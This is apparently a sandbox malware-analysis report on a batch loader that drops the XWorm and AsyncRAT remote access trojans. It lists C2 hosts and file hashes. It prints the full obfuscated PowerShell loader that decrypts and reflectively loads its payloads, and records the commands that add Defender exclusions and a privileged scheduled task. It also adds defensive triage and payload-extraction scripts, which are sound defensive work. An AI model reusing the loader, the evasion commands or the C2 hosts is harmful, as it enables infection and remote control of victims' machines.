Analysis

  • max time kernel
    1045s
  • max time network
    1053s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    11/07/2024, 20:52

General

  • Target

    Loader.bat

  • Size

    192KB

  • MD5

    a94e4dec22b09ea37e33fdfa3638e5de

  • SHA1

    f90c1ea98c741bc63a3260721d1974962b9241ce

  • SHA256

    bb484dd134c649c660dbde9ceb4fe1fbac7e65fb934d8a9c288c1e86d1b189f4

  • SHA512

    a747324043860c06f28d4d7880a1df9f2bfbc6563fd42dffa76f3425a123aeb9bef29a4706dd11851f25c58acbf0c2fdfed775d68e9cb888b88a77ff2c0c6e0b

  • SSDEEP

    3072:GTv0B0ylSYSg4xt9mYNjvI6L41JOELI7m5Y+fk3T0dcZAIG0+BWtOy15c:Q0iyQC4xt4Y26c1kEU7uBuWMAISA5c

Malware Config

Extracted

Family

xworm

C2

unique-emotions.gl.at.ply.gg:54742

wiz.bounceme.net:6000

Attributes
  • Install_directory

    %AppData%

  • install_file

    USB.exe

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

C2

card-buzz.gl.at.ply.gg:2497

Mutex

rotrzgmheqhT

Attributes
  • delay

    3

  • install

    false

  • install_folder

    %AppData%

aes.plain

Signatures

  • AsyncRat

    AsyncRAT is a remote access trojan written in C#, designed to remotely monitor and control other computers.

  • Detect Xworm Payload (4 IoCs)
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Async RAT payload (1 IoC)
  • Blocklisted process makes network request (41 IoCs)
  • Command and Scripting Interpreter: PowerShell (1 TTP, 4 IoCs)

    Runs PowerShell with its display window hidden.

  • Checks computer location settings (2 TTPs, 1 IoC)

    Looks up the country code configured in the registry, likely for geofencing.

  • Drops startup file (2 IoCs)
  • Executes dropped EXE (18 IoCs)
  • Adds Run key to start application (2 TTPs, 1 IoC)
  • Enumerates physical storage devices (1 TTP)

    Attempts to interact with connected storage/optical drive(s).

  • Scheduled Task/Job: Scheduled Task (1 TTP, 1 IoC)

    schtasks.exe is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses (9 IoCs)
  • Suspicious use of AdjustPrivilegeToken (23 IoCs)
  • Suspicious use of SetWindowsHookEx (1 IoC)
  • Suspicious use of WriteProcessMemory (15 IoCs)
  • Uses Task Scheduler COM API (1 TTP)

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
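
The signatures above (Defender exclusions via Add-MpPreference, an every-minute scheduled task named "Update" with highest run level, a Run key, and dropped binaries under %Temp% and %AppData%) are the artifacts a responder would look for on a suspect host. The following PowerShell triage script is an added example, not part of the sandbox report or the sample. The indicator names, paths and task name are taken from this report; the 5-minute repetition threshold, the AppData heuristics and all function names are this example's own choices.

```powershell
# Added example: host triage for the persistence / defense-evasion artifacts this
# sandbox run recorded. Indicator names and paths come from the report; the
# repetition threshold and heuristics below are this example's own assumptions.

$SuspectNames = @('Update.exe', 'USB.exe')   # dropped binary and xworm install_file from the report

function Get-SuspectDefenderExclusions {
    # Add-MpPreference -ExclusionPath / -ExclusionProcess leave entries that
    # Get-MpPreference returns; flag any that end in one of the suspect names.
    $pref = Get-MpPreference
    foreach ($entry in @($pref.ExclusionPath) + @($pref.ExclusionProcess)) {
        if (-not $entry) { continue }
        foreach ($name in $SuspectNames) {
            if ($entry -like "*$name") {
                [pscustomobject]@{ Kind = 'DefenderExclusion'; Value = $entry }
            }
        }
    }
}

function Get-SuspectScheduledTasks {
    # "schtasks /sc minute /mo 1" becomes a time trigger with Repetition.Interval PT1M.
    # Flag tasks whose action runs from a user profile and that repeat at most every
    # 5 minutes (assumed threshold), or that carry the task name seen in the report.
    foreach ($task in Get-ScheduledTask) {
        $fast = $false
        foreach ($trig in @($task.Triggers)) {
            $interval = $trig.Repetition.Interval
            if ($interval -and [System.Xml.XmlConvert]::ToTimeSpan($interval).TotalMinutes -le 5) { $fast = $true }
        }
        foreach ($action in @($task.Actions)) {
            if ($action.Execute -match '(?i)\\Users\\' -and ($fast -or $task.TaskName -eq 'Update')) {
                [pscustomobject]@{
                    Kind  = 'ScheduledTask'
                    Value = "$($task.TaskPath)$($task.TaskName) -> $($action.Execute) (RunLevel=$($task.Principal.RunLevel))"
                }
            }
        }
    }
}

function Get-SuspectRunKeys {
    # "Adds Run key to start application": flag Run values that point into AppData.
    $runKeys = @(
        'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run'
    )
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -like 'PS*') { continue }   # provider metadata, not a Run value
            if ([string]$p.Value -match '(?i)\\AppData\\(Roaming|Local)\\') {
                [pscustomobject]@{ Kind = 'RunKey'; Value = "$key\$($p.Name) = $($p.Value)" }
            }
        }
    }
}

function Get-SuspectFiles {
    # Paths the report shows: %Temp%\Update.exe, %AppData%\Update.exe, the xworm
    # install_file USB.exe, plus the per-user Startup folder ("Drops startup file").
    $dirs = @($env:TEMP, $env:APPDATA, [Environment]::GetFolderPath('Startup'))
    foreach ($dir in $dirs) {
        foreach ($name in $SuspectNames) {
            $path = Join-Path $dir $name
            if (Test-Path -LiteralPath $path) {
                $hash = (Get-FileHash -LiteralPath $path -Algorithm SHA256).Hash.ToLower()
                [pscustomobject]@{ Kind = 'DroppedFile'; Value = "$path sha256=$hash" }
            }
        }
    }
}

$findings = @(Get-SuspectDefenderExclusions) + @(Get-SuspectScheduledTasks) +
            @(Get-SuspectRunKeys) + @(Get-SuspectFiles)
if ($findings.Count -eq 0) { 'No indicators from this report found on this host.' }
else { $findings | Format-Table -AutoSize }
```

Run it in an elevated PowerShell on the suspect host; Get-MpPreference and the HKLM Run key need administrator rights to read fully. A clean host prints nothing beyond the final line. The dropped-file check is only as good as the filenames, so treat the Defender-exclusion and minute-interval task findings as the stronger signals: both are unusual on an end-user machine regardless of the name used.
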

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Loader.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2088
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GH3abWd9uo3DMEDckKzwyw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $BZojv=New-Object System.IO.MemoryStream(,$param_var); $jqKwU=New-Object System.IO.MemoryStream; $YBFLc=New-Object System.IO.Compression.GZipStream($BZojv, [IO.Compression.CompressionMode]::Decompress); $YBFLc.CopyTo($jqKwU); $YBFLc.Dispose(); $BZojv.Dispose(); $jqKwU.Dispose(); $jqKwU.ToArray();}function execute_function($param_var,$param2_var){ $HnXah=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ASDSB=$HnXah.EntryPoint; $ASDSB.Invoke($null, $param2_var);}$HxmrU = 'C:\Users\Admin\AppData\Local\Temp\Loader.bat';$host.UI.RawUI.WindowTitle = $HxmrU;$YminX=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($HxmrU).Split([Environment]::NewLine);foreach ($LBczd in $YminX) { if ($LBczd.StartsWith('zyIAYTpLJuqqlwNwSYZB')) { $nGVNd=$LBczd.Substring(20); break; }}$payloads_var=[string[]]$nGVNd.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
      2⤵
        PID:5016
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        2⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1952
        • C:\Users\Admin\AppData\Local\Temp\Update.exe
          "C:\Users\Admin\AppData\Local\Temp\Update.exe"
          3⤵
          • Checks computer location settings
          • Drops startup file
          • Executes dropped EXE
          • Adds Run key to start application
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:1556
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:2380
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:972
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Update.exe'
            4⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3012
          • C:\Windows\System32\schtasks.exe
            "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Roaming\Update.exe"
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:3912
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1348
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:2348
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4104
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4456
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1520
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1184
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:620
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3384
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:216
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4860
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3408
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3464
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1700
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3716
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1256
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4792
    • C:\Users\Admin\AppData\Roaming\Update.exe
      C:\Users\Admin\AppData\Roaming\Update.exe
      1⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:1756
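
The cmd.exe command line at depth 2 above is the whole loader. The reversed string literals resolve to .NET method names ('gnirtS46esaBmorF' reversed is FromBase64String, 'txeTllAdaeR' is ReadAllText, 'daoL' is Load), and the script reads Loader.bat back in, takes the first line that begins with the 20-character marker zyIAYTpLJuqqlwNwSYZB, splits the remainder on '\', and for each blob undoes a character substitution ('#' for '/', '@' for 'A'), base64-decodes, AES-256-CBC-decrypts with the embedded key and IV, GZip-decompresses, and calls Assembly.Load followed by EntryPoint.Invoke. The second payload is invoked with a one-element string[] argument. The PowerShell script below is an added example, not code from the report or the sample: it replays that pipeline but writes the payloads to disk instead of loading them. The marker, key and IV are copied from the loader; the function names, output layout and PE sanity check are this example's own.

```powershell
# Added example (not part of the sandbox report or the sample): static extractor
# that replays the loader's base64 -> AES-256-CBC -> GZip pipeline and writes the
# recovered payloads to disk instead of handing them to Assembly.Load.
# Marker, key and IV are copied from the loader command line; everything else
# (function names, output directory, PE check) is this example's own choice.
param(
    [Parameter(Mandatory = $true)][string]$BatPath,
    [string]$OutDir = (Join-Path (Get-Location) 'extracted')
)

$Marker = 'zyIAYTpLJuqqlwNwSYZB'                          # prefix of the payload line in Loader.bat
$KeyB64 = 'rP6ipY8ykCrcY/vqOWugxQ2mrpqqQx5JkOzMlDOKmOA='  # 32-byte key => AES-256
$IvB64  = 'GH3abWd9uo3DMEDckKzwyw=='                      # 16-byte CBC IV

function ConvertFrom-LoaderBase64 {
    # The .bat stores each blob in a mangled base64 alphabet: '/' became '#'
    # and 'A' became '@'. Undo that before decoding.
    param([string]$Text)
    $bytes = [Convert]::FromBase64String($Text.Replace('#', '/').Replace('@', 'A'))
    return ,$bytes   # leading comma keeps the byte[] intact through the pipeline
}

function Unprotect-LoaderBlob {
    param([byte[]]$Cipher)
    $aes = [System.Security.Cryptography.Aes]::Create()
    try {
        $aes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
        $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
        $aes.Key     = [Convert]::FromBase64String($KeyB64)
        $aes.IV      = [Convert]::FromBase64String($IvB64)
        $dec = $aes.CreateDecryptor()
        try     { $plain = $dec.TransformFinalBlock($Cipher, 0, $Cipher.Length) }
        finally { $dec.Dispose() }
    } finally { $aes.Dispose() }
    return ,$plain
}

function Expand-GZipBytes {
    param([byte[]]$Data)
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    try     { $gz.CopyTo($out); $result = $out.ToArray() }
    finally { $gz.Dispose(); $in.Dispose(); $out.Dispose() }
    return ,$result
}

function Export-LoaderPayloads {
    param([string]$Path, [string]$Destination)
    # The loader reads its own .bat, finds the first line that starts with the
    # marker, strips the marker and splits the remainder on '\'.
    $line = Get-Content -LiteralPath $Path | Where-Object { $_.StartsWith($Marker) } | Select-Object -First 1
    if (-not $line) { throw "No line starting with marker '$Marker' in $Path" }
    New-Item -ItemType Directory -Force -Path $Destination | Out-Null
    $blobs = $line.Substring($Marker.Length).Split('\')
    for ($i = 0; $i -lt $blobs.Length; $i++) {
        $plain = Expand-GZipBytes (Unprotect-LoaderBlob (ConvertFrom-LoaderBase64 $blobs[$i]))
        # Both payloads go to Assembly.Load in the loader, so a PE ('MZ') header is
        # expected; payload 2 also receives a string[] argument (a Main(string[]) entry point).
        $isPe = ($plain.Length -gt 2 -and $plain[0] -eq 0x4D -and $plain[1] -eq 0x5A)
        $sha  = [System.Security.Cryptography.SHA256]::Create().ComputeHash($plain)
        $out  = Join-Path $Destination ('payload{0}.bin' -f ($i + 1))
        [System.IO.File]::WriteAllBytes($out, $plain)
        [pscustomobject]@{
            Index  = $i + 1
            Bytes  = $plain.Length
            IsPE   = $isPe
            SHA256 = ([System.BitConverter]::ToString($sha) -replace '-').ToLower()
            Path   = $out
        }
    }
}

Export-LoaderPayloads -Path $BatPath -Destination $OutDir | Format-Table -AutoSize
```

Run it in an isolated analysis VM as `.\extract.ps1 -BatPath .\Loader.bat`; nothing in it loads or executes the decrypted assemblies, it only decodes them and prints their size, PE check and SHA-256. The key and IV are specific to this build: for another sample built the same way, read them out of the `$aes_var.Key` and `$aes_var.IV` assignments in its own command line instead of reusing these. If a blob fails with a padding error, the wrong key or IV is the usual cause; if decryption succeeds but GZip fails, the substitution characters were changed by the builder and the Replace calls need updating.
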

    Network

    MITRE ATT&CK Enterprise v15

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Update.exe.log

      Filesize

      654B

      MD5

      2ff39f6c7249774be85fd60a8f9a245e

      SHA1

      684ff36b31aedc1e587c8496c02722c6698c1c4e

      SHA256

      e1b91642d85d98124a6a31f710e137ab7fd90dec30e74a05ab7fcf3b7887dced

      SHA512

      1d7e8b92ef4afd463d62cfa7e8b9d1799db5bf2a263d3cd7840df2e0a1323d24eb595b5f8eb615c6cb15f9e3a7b4fc99f8dd6a3d34479222e966ec708998aed1

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      d85ba6ff808d9e5444a4b369f5bc2730

      SHA1

      31aa9d96590fff6981b315e0b391b575e4c0804a

      SHA256

      84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

      SHA512

      8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      01d89dd05c27325bbfe34d7a2bc716ad

      SHA1

      fa0a5ce95e7e989da44face5a736172aba834ddc

      SHA256

      52bf1aacc2b2f03b2bbdca40b7eff5e041c8f2892575b3bf5cbaa000a02f71e9

      SHA512

      d7500eae5877d297fec543b607a1e6764ac07002178e92306de9b5a9cc76d9f42cdaa9a2b086ed1d3174c660afa120228affa80a4fb1ac4a430f7028449e0adb

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      948B

      MD5

      083782a87bd50ffc86d70cbc6f04e275

      SHA1

      0c11bc2b2c2cf33b17fff5e441881131ac1bee31

      SHA256

      7a54dcc99ebfb850afde560857e2d1f764a53ff09efd03222f56ab547539798f

      SHA512

      a7e56293e07acce20e69dceb13282e5d1eed2ef972a4c9cf1fb4f973b4b7d6a9ca8714fc547ab662842205383891372a2386fc3a12af3d7e4ef6a195f8a2bf02

    • C:\Users\Admin\AppData\Local\Temp\Update.exe

      Filesize

      59KB

      MD5

      07ac8571846ca0cc9f6fcdbe1d000be2

      SHA1

      3cbe16f7d24d40b590f97b1999c64c5bb889e8c6

      SHA256

      2a3bcea7cadf94c65d4462b2297285078f5232e84267dfa641cb23475ffdb1b5

      SHA512

      56413d14e5ee2e615c19232d93047c9d2cc422e083eda0f9f5ae1dc04798989e73d5ad80e06a7dda166deb0177206fb1ed045773bba3975667c12409d67d1e7e

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i2bydf0a.a4t.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • memory/1556-94-0x00007FFDA8090000-0x00007FFDA8B51000-memory.dmp

      Filesize

      10.8MB

    • memory/1556-93-0x00007FFDA8093000-0x00007FFDA8095000-memory.dmp

      Filesize

      8KB

    • memory/1556-90-0x000000001C0C0000-0x000000001C0CE000-memory.dmp

      Filesize

      56KB

    • memory/1556-84-0x00007FFDA8090000-0x00007FFDA8B51000-memory.dmp

      Filesize

      10.8MB

    • memory/1556-40-0x0000000000310000-0x0000000000326000-memory.dmp

      Filesize

      88KB

    • memory/1556-39-0x00007FFDA8093000-0x00007FFDA8095000-memory.dmp

      Filesize

      8KB

    • memory/1952-28-0x0000000007AE0000-0x0000000007AF2000-memory.dmp

      Filesize

      72KB

    • memory/1952-7-0x0000000005FD0000-0x0000000006036000-memory.dmp

      Filesize

      408KB

    • memory/1952-22-0x0000000007F60000-0x00000000085DA000-memory.dmp

      Filesize

      6.5MB

    • memory/1952-23-0x00000000078E0000-0x00000000078FA000-memory.dmp

      Filesize

      104KB

    • memory/1952-24-0x0000000007A00000-0x0000000007A08000-memory.dmp

      Filesize

      32KB

    • memory/1952-25-0x0000000007A20000-0x0000000007A4C000-memory.dmp

      Filesize

      176KB

    • memory/1952-0-0x0000000074B4E000-0x0000000074B4F000-memory.dmp

      Filesize

      4KB

    • memory/1952-20-0x0000000006980000-0x00000000069C4000-memory.dmp

      Filesize

      272KB

    • memory/1952-19-0x0000000006590000-0x00000000065DC000-memory.dmp

      Filesize

      304KB

    • memory/1952-18-0x0000000006550000-0x000000000656E000-memory.dmp

      Filesize

      120KB

    • memory/1952-1-0x0000000003060000-0x0000000003096000-memory.dmp

      Filesize

      216KB

    • memory/1952-17-0x0000000006060000-0x00000000063B4000-memory.dmp

      Filesize

      3.3MB

    • memory/1952-6-0x0000000005F60000-0x0000000005FC6000-memory.dmp

      Filesize

      408KB

    • memory/1952-21-0x0000000007660000-0x00000000076D6000-memory.dmp

      Filesize

      472KB

    • memory/1952-5-0x0000000005680000-0x00000000056A2000-memory.dmp

      Filesize

      136KB

    • memory/1952-85-0x0000000007E90000-0x0000000007F2C000-memory.dmp

      Filesize

      624KB

    • memory/1952-86-0x0000000008B90000-0x0000000009134000-memory.dmp

      Filesize

      5.6MB

    • memory/1952-87-0x00000000722D5000-0x00000000722D6000-memory.dmp

      Filesize

      4KB

    • memory/1952-88-0x0000000074B4E000-0x0000000074B4F000-memory.dmp

      Filesize

      4KB

    • memory/1952-89-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-4-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-92-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-3-0x0000000074B40000-0x00000000752F0000-memory.dmp

      Filesize

      7.7MB

    • memory/1952-2-0x0000000005800000-0x0000000005E28000-memory.dmp

      Filesize

      6.2MB

    • memory/2380-41-0x000002836EA30000-0x000002836EA52000-memory.dmp

      Filesize

      136KB